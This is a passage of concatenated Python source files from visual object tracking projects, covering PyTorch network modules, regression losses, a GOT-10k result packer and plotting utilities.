settings.result_plot_path = '/home/iccd/Documents/Stark-fusion/lib/test/result_plots/'
settings.results_path = '/home/iccd/Documents/Stark-fusion/lib/test/tracking_results/' # Where to store tracking results
settings.segmentation_path = '/home/iccd/Documents/Stark-fusion/lib/test/segmentation_results/'
settings.tn_packed_results_path = ''
settings.tpl_path = ''
settings.trackingnet_path = ''
settings.uav_path = ''
settings.vot_path = ''
settings.youtubevos_dir = ''
return settings
```
#### File: parameter/transt/transt50.py
```python
from pytracking.utils import TrackerParams
from pytracking.features.net_wrappers import NetWithBackbone
def parameters(netepoch=None):
params = TrackerParams()
params.debug = 0
params.visualization = False
params.use_gpu = True
params.net = NetWithBackbone(net_path=netepoch,
use_gpu=params.use_gpu)
return params
```
#### File: pytracking/util_scripts/pack_got10k_results.py
```python
import numpy as np
import os
import shutil
from pytracking.evaluation.environment import env_settings
def pack_got10k_results(tracker_name, param_name, output_name):
""" Packs toolkit results into a zip folder which can be directly uploaded to the evaluation server. The packed
file is saved in the folder env_settings().got_packed_results_path
args:
tracker_name - name of the tracker
param_name - name of the parameter file
output_name - name of the packed zip file
"""
output_path = os.path.join(env_settings().got_packed_results_path, output_name)
if not os.path.exists(output_path):
os.makedirs(output_path)
results_path = env_settings().results_path
for i in range(1,181):
seq_name = 'GOT-10k_Test_{:06d}'.format(i)
seq_output_path = '{}/{}'.format(output_path, seq_name)
if not os.path.exists(seq_output_path):
os.makedirs(seq_output_path)
for run_id in range(1):
res = np.loadtxt('{}/{}/{}_{:03d}/{}.txt'.format(results_path, tracker_name, param_name, run_id, seq_name), dtype=np.float64)
times = np.loadtxt(
'{}/{}/{}_{:03d}/{}_time.txt'.format(results_path, tracker_name, param_name, run_id, seq_name),
dtype=np.float64)
np.savetxt('{}/{}_{:03d}.txt'.format(seq_output_path, seq_name, run_id+1), res, delimiter=',', fmt='%f')
np.savetxt('{}/{}_time.txt'.format(seq_output_path, seq_name), times, fmt='%f')
# Generate ZIP file
shutil.make_archive(output_path, 'zip', output_path)
# Remove raw text files
shutil.rmtree(output_path)
def main():
pack_got10k_results('transt', 'transt50', 'transt')
if __name__ == '__main__':
main()
```
|
{
"source": "Jee-King/ICCV2021_Event_Frame_Tracking",
"score": 3
}
|
#### File: models/backbone/counter_guide.py
```python
import torch,os
import torch.nn as nn
from torch.nn.parameter import Parameter
class Multi_Context(nn.Module):
def __init__(self, inchannels):
super(Multi_Context, self).__init__()
self.conv2_1 = nn.Sequential(
nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=1, stride=1, padding=0),
nn.BatchNorm2d(inchannels),
nn.ReLU(inplace=True))
self.conv2_2 = nn.Sequential(
nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=3, stride=1, padding=1),
nn.BatchNorm2d(inchannels),
nn.ReLU(inplace=True))
self.conv2_3 = nn.Sequential(
nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=5, stride=1, padding=2),
nn.BatchNorm2d(inchannels),
nn.ReLU(inplace=True))
self.conv2 = nn.Sequential(
nn.Conv2d(in_channels=inchannels * 3, out_channels=inchannels, kernel_size=3, padding=1),
nn.BatchNorm2d(inchannels))
def forward(self, x):
x1 = self.conv2_1(x)
x2 = self.conv2_2(x)
x3 = self.conv2_3(x)
x = torch.cat([x1,x2,x3], dim=1)
x = self.conv2(x)
return x
class Adaptive_Weight(nn.Module):
def __init__(self, inchannels):
super(Adaptive_Weight, self).__init__()
self.avg = nn.AdaptiveAvgPool2d(1)
self.inchannels = inchannels
self.fc1 = nn.Conv2d(inchannels, inchannels//4, kernel_size=1, bias=False)
self.relu1 = nn.ReLU()
self.fc2 = nn.Conv2d(inchannels//4, 1, kernel_size=1, bias=False)
self.relu2 = nn.ReLU()
self.sigmoid = nn.Sigmoid()
def forward(self, x):
x_avg = self.avg(x)
weight = self.relu1(self.fc1(x_avg))
weight = self.relu2(self.fc2(weight))
weight = self.sigmoid(weight)
out = x * weight
return out
class Counter_attention(nn.Module):
def __init__(self, inchannels):
super(Counter_attention, self).__init__()
self.conv1 = nn.Sequential(nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=3, padding=1),
nn.BatchNorm2d(inchannels))
self.conv2 = nn.Sequential(nn.Conv2d(in_channels=inchannels, out_channels=inchannels, kernel_size=3, padding=1),
nn.BatchNorm2d(inchannels))
# self.conv3 = nn.Sequential(nn.Conv2d(in_channels=inchannels*2, out_channels=inchannels, kernel_size=1),
# nn.BatchNorm2d(inchannels))
self.sig = nn.Sigmoid()
self.mc1 = Multi_Context(inchannels)
self.mc2 = Multi_Context(inchannels)
self.ada_w1 = Adaptive_Weight(inchannels)
self.ada_w2 = Adaptive_Weight(inchannels)
def forward(self, assistant, present):
mc1 = self.mc1(assistant)
pr1 = present * self.sig(mc1)
pr2 = self.conv1(present)
pr2 = present * self.sig(pr2)
out1 = pr1 + pr2 + present
mc2 = self.mc2(present)
as1 = assistant * self.sig(mc2)
as2 = self.conv2(assistant)
as2 = assistant * self.sig(as2)
out2 = as1 + as2 + assistant
out1 = self.ada_w1(out1)
out2 = self.ada_w2(out2)
out = out1 + out2
# out = torch.cat([out1, out2], dim=1)
# out = self.conv3(out)
return out
class Counter_Guide(nn.Module):
def __init__(self):
super(Counter_Guide, self).__init__()
self.counter_atten1 = Counter_attention(128)
self.counter_atten2 = Counter_attention(256)
def forward(self, frame1, frame2, event1, event2):
out1 = self.counter_atten1(frame1, event1)
out2 = self.counter_atten2(frame2, event2)
return out1, out2
if __name__ == '__main__':
net = Counter_Guide()
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
net = net.cuda()
var1 = torch.FloatTensor(10, 128, 36, 36).cuda()
var2 = torch.FloatTensor(10, 256, 18, 18).cuda()
var3 = torch.FloatTensor(10, 128, 36, 36).cuda()
var4 = torch.FloatTensor(10, 256, 18, 18).cuda()
# var = Variable(var)
out1, out2 = net(var1, var2, var3, var4)
print('*************')
print(out1.shape, out2.shape)
```
#### File: models/loss/kl_regression.py
```python
import math
import torch
import torch.nn as nn
from torch.nn import functional as F
class KLRegression(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density, mc_dim=-1):
"""Args:
scores: predicted score values
sample_density: probability density of the sample distribution
gt_density: probability density of the ground truth distribution
mc_dim: dimension of the MC samples"""
exp_val = scores - torch.log(sample_density + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim]) - \
torch.mean(scores * (gt_density / (sample_density + self.eps)), dim=mc_dim)
return L.mean()
class MLRegression(nn.Module):
"""Maximum likelihood loss for probabilistic regression.
It is computed using Monte Carlo (MC) samples from an arbitrary distribution."""
def __init__(self, eps=0.0):
super().__init__()
self.eps = eps
def forward(self, scores, sample_density, gt_density=None, mc_dim=-1):
"""Args:
scores: predicted score values. First sample must be ground-truth
sample_density: probability density of the sample distribution
gt_density: not used
mc_dim: dimension of the MC samples. Only mc_dim=1 supported"""
assert mc_dim == 1
assert (sample_density[:,0,...] == -1).all()
exp_val = scores[:, 1:, ...] - torch.log(sample_density[:, 1:, ...] + self.eps)
L = torch.logsumexp(exp_val, dim=mc_dim) - math.log(scores.shape[mc_dim] - 1) - scores[:, 0, ...]
loss = L.mean()
return loss
class KLRegressionGrid(nn.Module):
"""KL-divergence loss for probabilistic regression.
It is computed using the grid integration strategy."""
def forward(self, scores, gt_density, grid_dim=-1, grid_scale=1.0):
"""Args:
scores: predicted score values
gt_density: probability density of the ground truth distribution
grid_dim: dimension(s) of the grid
grid_scale: area of one grid cell"""
score_corr = grid_scale * torch.sum(scores * gt_density, dim=grid_dim)
L = torch.logsumexp(scores, dim=grid_dim) + math.log(grid_scale) - score_corr
return L.mean()
```
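A hedged usage sketch for `KLRegression`: the batch size, sample count and densities below are illustrative assumptions; the only requirement from `forward` is that scores and both densities share the MC dimension.

```python
import torch

loss_fn = KLRegression(eps=1e-8)
scores = torch.randn(8, 128)               # predicted scores for 128 MC samples
sample_density = torch.rand(8, 128) + 0.1  # proposal density q(x) at each sample
gt_density = torch.rand(8, 128)            # ground-truth density p(x) at each sample
loss = loss_fn(scores, sample_density, gt_density, mc_dim=1)
print(loss.item())
```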
#### File: models/lwl/initializer.py
```python
import torch.nn as nn
class FilterInitializerZero(nn.Module):
"""Initializes a target model with zeros.
args:
filter_size: Size of the filter.
feature_dim: Input feature dimentionality."""
def __init__(self, filter_size=1, num_filters=1, feature_dim=256, filter_groups=1):
super().__init__()
self.filter_size = (num_filters, feature_dim//filter_groups, filter_size, filter_size)
def forward(self, feat, mask=None):
assert feat.dim() == 5
# num_sequences = feat.shape[1] if feat.dim() == 5 else 1
num_sequences = feat.shape[1]
return feat.new_zeros(num_sequences, *self.filter_size)
```
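Because `FilterInitializerZero` only reads the sequence dimension of its input, a usage sketch needs nothing but a correctly shaped tensor (all sizes below are assumptions):

```python
import torch

initializer = FilterInitializerZero(filter_size=3, num_filters=1, feature_dim=256)
feat = torch.randn(2, 4, 256, 30, 30)   # (frames, sequences, C, H, W)
weights = initializer(feat)
print(weights.shape)                     # torch.Size([4, 1, 256, 3, 3]), all zeros
```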
#### File: models/lwl/linear_filter.py
```python
import torch.nn as nn
import ltr.models.layers.filter as filter_layer
import math
from pytracking import TensorList
class LinearFilter(nn.Module):
""" Target model constituting a single conv layer, along with the few-shot learner used to obtain the target model
parameters (referred to as filter), i.e. weights of the conv layer
"""
def __init__(self, filter_size, filter_initializer, filter_optimizer=None, feature_extractor=None,
filter_dilation_factors=None):
super().__init__()
self.filter_size = filter_size
self.feature_extractor = feature_extractor # Extracts features input to the target model
self.filter_initializer = filter_initializer # Predicts an initial filter in a feed-forward manner
self.filter_optimizer = filter_optimizer # Iteratively updates the filter by minimizing the few-shot
# learning loss
self.filter_dilation_factors = filter_dilation_factors
# Init weights
for m in self.feature_extractor.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
if m.bias is not None:
m.bias.data.zero_()
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, train_feat, test_feat, train_label, *args, **kwargs):
""" the mask should be 5d"""
assert train_label.dim() == 5
num_sequences = train_label.shape[1]
if train_feat.dim() == 5:
train_feat = train_feat.view(-1, *train_feat.shape[-3:])
if test_feat.dim() == 5:
test_feat = test_feat.view(-1, *test_feat.shape[-3:])
# Extract target model features
train_feat = self.extract_target_model_features(train_feat, num_sequences)
test_feat = self.extract_target_model_features(test_feat, num_sequences)
# Train filter
filter, filter_iter, _ = self.get_filter(train_feat, train_label,
*args, **kwargs)
# Predict mask encodings for the test frames
mask_encodings = [self.apply_target_model(f, test_feat) for f in filter_iter]
return mask_encodings
def extract_target_model_features(self, feat, num_sequences=None):
if self.feature_extractor is None:
return feat
if num_sequences is None:
return self.feature_extractor(feat)
output = self.feature_extractor(feat)
return output.view(-1, num_sequences, *output.shape[-3:])
def apply_target_model(self, weights, feat):
""" Apply the target model to obtain the mask encodings"""
mask_encoding = filter_layer.apply_filter(feat, weights, dilation_factors=self.filter_dilation_factors)
return mask_encoding
def get_filter(self, feat, train_label, train_sw, num_objects=None, *args, **kwargs):
""" Get the initial target model parameters given the few-shot labels """
        weights = self.filter_initializer(feat, train_label)
        if num_objects is not None:
            weights = weights.repeat(1, num_objects, 1, 1, 1)
if self.filter_optimizer is not None:
weights, weights_iter, losses = self.filter_optimizer(TensorList([weights]), feat=feat, label=train_label,
sample_weight=train_sw,
*args, **kwargs)
weights = weights[0]
weights_iter = [w[0] for w in weights_iter]
else:
weights_iter = [weights]
losses = None
return weights, weights_iter, losses
```
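The weight initialization in `__init__` above is the He/Kaiming normal scheme: weights are drawn from N(0, 2/n) with n = k_h * k_w * C_out. A worked example of the resulting standard deviation (the kernel size and channel count are assumptions):

```python
import math

kernel_size, out_channels = 3, 256
n = kernel_size * kernel_size * out_channels
std = math.sqrt(2.0 / n)
print(round(std, 4))  # 0.0295 for a 3x3 conv with 256 output channels
```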
#### File: models/lwl/lwl_net.py
```python
import math
import torch
import torch.nn as nn
from collections import OrderedDict
import ltr.models.lwl.linear_filter as target_clf
import ltr.models.target_classifier.features as clf_features
import ltr.models.lwl.initializer as seg_initializer
import ltr.models.lwl.label_encoder as seg_label_encoder
import ltr.models.lwl.loss_residual_modules as loss_residual_modules
import ltr.models.lwl.decoder as lwtl_decoder
import ltr.models.backbone as backbones
import ltr.models.backbone.resnet_mrcnn as mrcnn_backbones
import ltr.models.meta.steepestdescent as steepestdescent
from ltr import model_constructor
from pytracking import TensorList
class LWTLNet(nn.Module):
def __init__(self, feature_extractor, target_model, decoder, target_model_input_layer, decoder_input_layers,
label_encoder=None):
super().__init__()
self.feature_extractor = feature_extractor # Backbone feature extractor F
self.target_model = target_model # Target model and the few-shot learner
self.decoder = decoder # Segmentation Decoder
self.label_encoder = label_encoder # Few-shot label generator and weight predictor
self.target_model_input_layer = (target_model_input_layer,) if isinstance(target_model_input_layer,
str) else target_model_input_layer
self.decoder_input_layers = decoder_input_layers
self.output_layers = sorted(list(set(self.target_model_input_layer + self.decoder_input_layers)))
def forward(self, train_imgs, test_imgs, train_masks, test_masks, num_refinement_iter=2):
num_sequences = train_imgs.shape[1]
num_train_frames = train_imgs.shape[0]
num_test_frames = test_imgs.shape[0]
# Extract backbone features
train_feat_backbone = self.extract_backbone_features(
train_imgs.view(-1, train_imgs.shape[-3], train_imgs.shape[-2], train_imgs.shape[-1]))
test_feat_backbone = self.extract_backbone_features(
test_imgs.view(-1, test_imgs.shape[-3], test_imgs.shape[-2], test_imgs.shape[-1]))
# Extract features input to the target model
train_feat_tm = self.extract_target_model_features(train_feat_backbone) # seq*frames, channels, height, width
train_feat_tm = train_feat_tm.view(num_train_frames, num_sequences, *train_feat_tm.shape[-3:])
train_feat_tm_all = [train_feat_tm, ]
# Get few-shot learner label and spatial importance weights
few_shot_label, few_shot_sw = self.label_encoder(train_masks, train_feat_tm)
few_shot_label_all = [few_shot_label, ]
few_shot_sw_all = None if few_shot_sw is None else [few_shot_sw, ]
test_feat_tm = self.extract_target_model_features(test_feat_backbone) # seq*frames, channels, height, width
# Obtain the target module parameters using the few-shot learner
filter, filter_iter, _ = self.target_model.get_filter(train_feat_tm, few_shot_label, few_shot_sw)
        mask_predictions_all = []
# Iterate over the test sequence
for i in range(num_test_frames):
# Features for the current frame
test_feat_tm_it = test_feat_tm.view(num_test_frames, num_sequences, *test_feat_tm.shape[-3:])[i:i+1, ...]
# Apply the target model to obtain mask encodings.
mask_encoding_pred = [self.target_model.apply_target_model(f, test_feat_tm_it) for f in filter_iter]
test_feat_backbone_it = {k: v.view(num_test_frames, num_sequences, *v.shape[-3:])[i, ...] for k, v in
test_feat_backbone.items()}
mask_encoding_pred_last_iter = mask_encoding_pred[-1]
# Run decoder to obtain the segmentation mask
mask_pred, decoder_feat = self.decoder(mask_encoding_pred_last_iter, test_feat_backbone_it,
test_imgs.shape[-2:])
mask_pred = mask_pred.view(1, num_sequences, *mask_pred.shape[-2:])
            mask_predictions_all.append(mask_pred)
# Convert the segmentation scores to probability
mask_pred_prob = torch.sigmoid(mask_pred.clone().detach())
# Obtain label encoding for the predicted mask in the previous frame
few_shot_label, few_shot_sw = self.label_encoder(mask_pred_prob, test_feat_tm_it)
# Extend the training data using the predicted mask
few_shot_label_all.append(few_shot_label)
if few_shot_sw_all is not None:
few_shot_sw_all.append(few_shot_sw)
train_feat_tm_all.append(test_feat_tm_it)
# Update the target model using the extended training set
if (i < (num_test_frames - 1)) and (num_refinement_iter > 0):
train_feat_tm_it = torch.cat(train_feat_tm_all, dim=0)
few_shot_label_it = torch.cat(few_shot_label_all, dim=0)
if few_shot_sw_all is not None:
few_shot_sw_it = torch.cat(few_shot_sw_all, dim=0)
else:
few_shot_sw_it = None
# Run few-shot learner to update the target model
filter_updated, _, _ = self.target_model.filter_optimizer(TensorList([filter]),
feat=train_feat_tm_it,
label=few_shot_label_it,
sample_weight=few_shot_sw_it,
num_iter=num_refinement_iter)
filter = filter_updated[0] # filter_updated is a TensorList
        mask_predictions_all = torch.cat(mask_predictions_all, dim=0)
        return mask_predictions_all
def segment_target(self, target_filter, test_feat_tm, test_feat):
# Classification features
assert target_filter.dim() == 5 # seq, filters, ch, h, w
test_feat_tm = test_feat_tm.view(1, 1, *test_feat_tm.shape[-3:])
mask_encoding_pred = self.target_model.apply_target_model(target_filter, test_feat_tm)
mask_pred, decoder_feat = self.decoder(mask_encoding_pred, test_feat,
(test_feat_tm.shape[-2]*16, test_feat_tm.shape[-1]*16))
return mask_pred, mask_encoding_pred
def get_backbone_target_model_features(self, backbone_feat):
# Get the backbone feature block which is input to the target model
feat = OrderedDict({l: backbone_feat[l] for l in self.target_model_input_layer})
if len(self.target_model_input_layer) == 1:
return feat[self.target_model_input_layer[0]]
return feat
def extract_target_model_features(self, backbone_feat):
return self.target_model.extract_target_model_features(self.get_backbone_target_model_features(backbone_feat))
def extract_backbone_features(self, im, layers=None):
if layers is None:
layers = self.output_layers
return self.feature_extractor(im, layers)
@model_constructor
def steepest_descent_resnet50(filter_size=1, num_filters=1, optim_iter=3, optim_init_reg=0.01,
backbone_pretrained=False, clf_feat_blocks=1,
clf_feat_norm=True, final_conv=False,
out_feature_dim=512,
target_model_input_layer='layer3',
decoder_input_layers=("layer4", "layer3", "layer2", "layer1",),
detach_length=float('Inf'),
label_encoder_dims=(1, 1),
frozen_backbone_layers=(),
decoder_mdim=64, filter_groups=1,
use_bn_in_label_enc=True,
dilation_factors=None,
backbone_type='imagenet'):
# backbone feature extractor F
if backbone_type == 'imagenet':
backbone_net = backbones.resnet50(pretrained=backbone_pretrained, frozen_layers=frozen_backbone_layers)
elif backbone_type == 'mrcnn':
backbone_net = mrcnn_backbones.resnet50(pretrained=False, frozen_layers=frozen_backbone_layers)
else:
        raise ValueError("unknown backbone_type: {}".format(backbone_type))
norm_scale = math.sqrt(1.0 / (out_feature_dim * filter_size * filter_size))
layer_channels = backbone_net.out_feature_channels()
# Extracts features input to the target model
target_model_feature_extractor = clf_features.residual_basic_block(
feature_dim=layer_channels[target_model_input_layer],
num_blocks=clf_feat_blocks, l2norm=clf_feat_norm,
final_conv=final_conv, norm_scale=norm_scale,
out_dim=out_feature_dim)
# Few-shot label generator and weight predictor
label_encoder = seg_label_encoder.ResidualDS16SW(layer_dims=label_encoder_dims + (num_filters,),
use_bn=use_bn_in_label_enc)
# Predicts initial target model parameters
initializer = seg_initializer.FilterInitializerZero(filter_size=filter_size, num_filters=num_filters,
feature_dim=out_feature_dim, filter_groups=filter_groups)
# Computes few-shot learning loss
residual_module = loss_residual_modules.LWTLResidual(init_filter_reg=optim_init_reg,
filter_dilation_factors=dilation_factors)
# Iteratively updates the target model parameters by minimizing the few-shot learning loss
optimizer = steepestdescent.GNSteepestDescent(residual_module=residual_module, num_iter=optim_iter,
detach_length=detach_length,
residual_batch_dim=1, compute_losses=True)
# Target model and Few-shot learner
target_model = target_clf.LinearFilter(filter_size=filter_size, filter_initializer=initializer,
filter_optimizer=optimizer, feature_extractor=target_model_feature_extractor,
filter_dilation_factors=dilation_factors)
# Decoder
decoder_input_layers_channels = {L: layer_channels[L] for L in decoder_input_layers}
decoder = lwtl_decoder.LWTLDecoder(num_filters, decoder_mdim, decoder_input_layers_channels, use_bn=True)
net = LWTLNet(feature_extractor=backbone_net, target_model=target_model, decoder=decoder,
label_encoder=label_encoder,
target_model_input_layer=target_model_input_layer, decoder_input_layers=decoder_input_layers)
return net
```
#### File: models/tracking/kysnet.py
```python
import math
import torch
import torch.nn as nn
from collections import OrderedDict
import ltr.models.target_classifier as target_clf
import ltr.models.target_classifier.features as clf_features
import ltr.models.target_classifier.optimizer as clf_optimizer
import ltr.models.target_classifier.initializer as clf_initializer
import ltr.models.kys.predictor_wrapper as predictor_wrappers
import ltr.models.kys.response_predictor as resp_pred
import ltr.models.kys.cost_volume as cost_volume
import ltr.models.bbreg as bbmodels
import ltr.models.backbone as backbones
from ltr import model_constructor
class KYSNet(nn.Module):
def train(self, mode=True):
self.training = mode
self.backbone_feature_extractor.train(False)
self.dimp_classifier.train(False)
self.predictor.train(mode)
self.bb_regressor.train(mode)
if self.motion_feat_extractor is not None:
self.motion_feat_extractor.train(mode)
return self
def __init__(self, backbone_feature_extractor, dimp_classifier, predictor,
bb_regressor, classification_layer, bb_regressor_layer, train_feature_extractor=True,
train_iounet=True, motion_feat_extractor=None, motion_layer=()):
super().__init__()
assert not train_feature_extractor
self.backbone_feature_extractor = backbone_feature_extractor
self.dimp_classifier = dimp_classifier
self.predictor = predictor
self.bb_regressor = bb_regressor
self.classification_layer = classification_layer
self.bb_regressor_layer = bb_regressor_layer
self.motion_layer = list(motion_layer)
self.output_layers = sorted(list(set([self.classification_layer] + self.bb_regressor_layer + self.motion_layer)))
self.train_iounet = train_iounet
self.motion_feat_extractor = motion_feat_extractor
if not train_feature_extractor:
for p in self.backbone_feature_extractor.parameters():
p.requires_grad_(False)
def forward(self, test_image_cur, dimp_filters, test_label_cur, backbone_feat_prev, label_prev,
anno_prev, dimp_scores_prev, state_prev, dimp_jitter_fn):
raise NotImplementedError
def train_classifier(self, train_imgs, train_bb):
assert train_imgs.dim() == 5, 'Expect 5 dimensions for train'
num_sequences = train_imgs.shape[1]
num_train_images = train_imgs.shape[0]
# Extract backbone features
train_feat = self.extract_backbone_features(
train_imgs.view(-1, train_imgs.shape[-3], train_imgs.shape[-2], train_imgs.shape[-1]))
# Classification features
train_feat_clf = train_feat[self.classification_layer]
train_feat_clf = train_feat_clf.view(num_train_images, num_sequences, train_feat_clf.shape[-3],
train_feat_clf.shape[-2], train_feat_clf.shape[-1])
filter, train_losses = self.dimp_classifier.train_classifier(train_feat_clf, train_bb)
return filter
def extract_backbone_features(self, im, layers=None):
im = im.view(-1, *im.shape[-3:])
if layers is None:
layers = self.output_layers
return self.backbone_feature_extractor(im, layers)
def get_backbone_clf_feat(self, backbone_feat):
feat = backbone_feat[self.classification_layer]
return feat
def get_backbone_bbreg_feat(self, backbone_feat):
return [backbone_feat[l] for l in self.bb_regressor_layer]
def extract_classification_feat(self, backbone_feat):
return self.dimp_classifier.extract_classification_feat(self.get_backbone_clf_feat(backbone_feat))
def get_motion_feat(self, backbone_feat):
if self.motion_feat_extractor is not None:
motion_feat = self.motion_feat_extractor(backbone_feat)
return motion_feat
else:
return self.predictor.extract_motion_feat(backbone_feat[self.classification_layer])
def extract_features(self, im, layers):
if 'classification' not in layers:
return self.backbone_feature_extractor(im, layers)
backbone_layers = sorted(list(set([l for l in layers + [self.classification_layer] if l != 'classification' and l != 'motion'])))
all_feat = self.backbone_feature_extractor(im, backbone_layers)
all_feat['classification'] = self.dimp_classifier.extract_classification_feat(all_feat[self.classification_layer])
if self.motion_feat_extractor is not None:
motion_feat = self.motion_feat_extractor(all_feat)
all_feat['motion'] = motion_feat
else:
all_feat['motion'] = self.predictor.extract_motion_feat(all_feat[self.classification_layer])
return OrderedDict({l: all_feat[l] for l in layers})
@model_constructor
def kysnet_res50(filter_size=4, optim_iter=3, appearance_feature_dim=512,
optim_init_step=0.9, optim_init_reg=0.1, classification_layer='layer3', backbone_pretrained=True,
clf_feat_blocks=0, clf_feat_norm=True, final_conv=True, init_filter_norm=False,
mask_init_factor=3.0, score_act='relu', target_mask_act='sigmoid', num_dist_bins=100,
                 bin_displacement=0.1, detach_length=float('Inf'), train_feature_extractor=True, train_iounet=True,
iou_input_dim=(256, 256), iou_inter_dim=(256, 256),
cv_kernel_size=3, cv_max_displacement=9, cv_stride=1,
init_gauss_sigma=1.0,
state_dim=8, representation_predictor_dims=(64, 32), gru_ksz=3,
conf_measure='max', dimp_thresh=None):
# ######################## backbone ########################
backbone_net = backbones.resnet50(pretrained=backbone_pretrained)
norm_scale = math.sqrt(1.0 / (appearance_feature_dim * filter_size * filter_size))
# ######################## classifier ########################
clf_feature_extractor = clf_features.residual_bottleneck(num_blocks=clf_feat_blocks, l2norm=clf_feat_norm,
final_conv=final_conv, norm_scale=norm_scale,
out_dim=appearance_feature_dim)
# Initializer for the DiMP classifier
initializer = clf_initializer.FilterInitializerLinear(filter_size=filter_size, filter_norm=init_filter_norm,
feature_dim=appearance_feature_dim)
# Optimizer for the DiMP classifier
optimizer = clf_optimizer.DiMPSteepestDescentGN(num_iter=optim_iter, feat_stride=16,
init_step_length=optim_init_step,
init_filter_reg=optim_init_reg, init_gauss_sigma=init_gauss_sigma,
num_dist_bins=num_dist_bins,
bin_displacement=bin_displacement,
mask_init_factor=mask_init_factor,
score_act=score_act, act_param=None, mask_act=target_mask_act,
detach_length=detach_length)
# The classifier module
classifier = target_clf.LinearFilter(filter_size=filter_size, filter_initializer=initializer,
filter_optimizer=optimizer, feature_extractor=clf_feature_extractor)
# Bounding box regressor
bb_regressor = bbmodels.AtomIoUNet(input_dim=(4 * 128, 4 * 256), pred_input_dim=iou_input_dim,
pred_inter_dim=iou_inter_dim)
cost_volume_layer = cost_volume.CostVolume(cv_kernel_size, cv_max_displacement, stride=cv_stride,
abs_coordinate_output=True)
motion_response_predictor = resp_pred.ResponsePredictor(state_dim=state_dim,
representation_predictor_dims=representation_predictor_dims,
gru_ksz=gru_ksz,
conf_measure=conf_measure,
dimp_thresh=dimp_thresh)
response_predictor = predictor_wrappers.PredictorWrapper(cost_volume_layer, motion_response_predictor)
net = KYSNet(backbone_feature_extractor=backbone_net, dimp_classifier=classifier,
predictor=response_predictor,
bb_regressor=bb_regressor,
classification_layer=classification_layer, bb_regressor_layer=['layer2', 'layer3'],
train_feature_extractor=train_feature_extractor,
train_iounet=train_iounet)
return net
```
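The `norm_scale` computed above reduces to 1/sqrt(feature_dim * filter_size^2); plugging in the defaults `appearance_feature_dim=512` and `filter_size=4` gives:

```python
import math

appearance_feature_dim, filter_size = 512, 4
norm_scale = math.sqrt(1.0 / (appearance_feature_dim * filter_size * filter_size))
print(round(norm_scale, 5))  # 0.01105
```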
#### File: pytracking/utils/plotting.py
```python
import matplotlib.pyplot as plt
import numpy as np
import torch
import cv2
def draw_figure(fig):
fig.canvas.draw()
fig.canvas.flush_events()
plt.pause(0.001)
def show_tensor(a: torch.Tensor, fig_num = None, title = None, range=(None, None), ax=None):
"""Display a 2D tensor.
args:
fig_num: Figure number.
title: Title of figure.
"""
a_np = a.squeeze().cpu().clone().detach().numpy()
if a_np.ndim == 3:
a_np = np.transpose(a_np, (1, 2, 0))
if ax is None:
fig = plt.figure(fig_num)
plt.tight_layout()
plt.cla()
plt.imshow(a_np, vmin=range[0], vmax=range[1])
plt.axis('off')
plt.axis('equal')
if title is not None:
plt.title(title)
draw_figure(fig)
else:
ax.cla()
ax.imshow(a_np, vmin=range[0], vmax=range[1])
ax.set_axis_off()
ax.axis('equal')
if title is not None:
ax.set_title(title)
draw_figure(plt.gcf())
def plot_graph(a: torch.Tensor, fig_num = None, title = None):
"""Plot graph. Data is a 1D tensor.
args:
fig_num: Figure number.
title: Title of figure.
"""
a_np = a.squeeze().cpu().clone().detach().numpy()
if a_np.ndim > 1:
        raise ValueError("plot_graph expects a 1-dimensional tensor")
fig = plt.figure(fig_num)
# plt.tight_layout()
plt.cla()
plt.plot(a_np)
if title is not None:
plt.title(title)
draw_figure(fig)
def show_image_with_boxes(im, boxes, iou_pred=None, disp_ids=None):
im_np = im.clone().cpu().squeeze().numpy()
im_np = np.ascontiguousarray(im_np.transpose(1, 2, 0).astype(np.uint8))
boxes = boxes.view(-1, 4).cpu().numpy().round().astype(int)
# Draw proposals
for i_ in range(boxes.shape[0]):
if disp_ids is None or disp_ids[i_]:
bb = boxes[i_, :]
disp_color = (i_*38 % 256, (255 - i_*97) % 256, (123 + i_*66) % 256)
cv2.rectangle(im_np, (bb[0], bb[1]), (bb[0] + bb[2], bb[1] + bb[3]),
disp_color, 1)
if iou_pred is not None:
text_pos = (bb[0], bb[1] - 5)
cv2.putText(im_np, 'ID={} IOU = {:3.2f}'.format(i_, iou_pred[i_]), text_pos,
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1, bottomLeftOrigin=False)
im_tensor = torch.from_numpy(im_np.transpose(2, 0, 1)).float()
return im_tensor
def _pascal_color_map(N=256, normalized=False):
"""
Python implementation of the color map function for the PASCAL VOC data set.
Official Matlab version can be found in the PASCAL VOC devkit
http://host.robots.ox.ac.uk/pascal/VOC/voc2012/index.html#devkit
"""
def bitget(byteval, idx):
return (byteval & (1 << idx)) != 0
dtype = 'float32' if normalized else 'uint8'
cmap = np.zeros((N, 3), dtype=dtype)
for i in range(N):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7 - j)
g = g | (bitget(c, 1) << 7 - j)
b = b | (bitget(c, 2) << 7 - j)
c = c >> 3
cmap[i] = np.array([r, g, b])
cmap = cmap / 255 if normalized else cmap
return cmap
def overlay_mask(im, ann, alpha=0.5, colors=None, contour_thickness=None):
""" Overlay mask over image.
Source: https://github.com/albertomontesg/davis-interactive/blob/master/davisinteractive/utils/visualization.py
This function allows you to overlay a mask over an image with some
transparency.
# Arguments
im: Numpy Array. Array with the image. The shape must be (H, W, 3) and
the pixels must be represented as `np.uint8` data type.
ann: Numpy Array. Array with the mask. The shape must be (H, W) and the
            values must be integers
alpha: Float. Proportion of alpha to apply at the overlaid mask.
colors: Numpy Array. Optional custom colormap. It must have shape (N, 3)
being N the maximum number of colors to represent.
contour_thickness: Integer. Thickness of each object index contour draw
over the overlay. This function requires to have installed the
package `opencv-python`.
# Returns
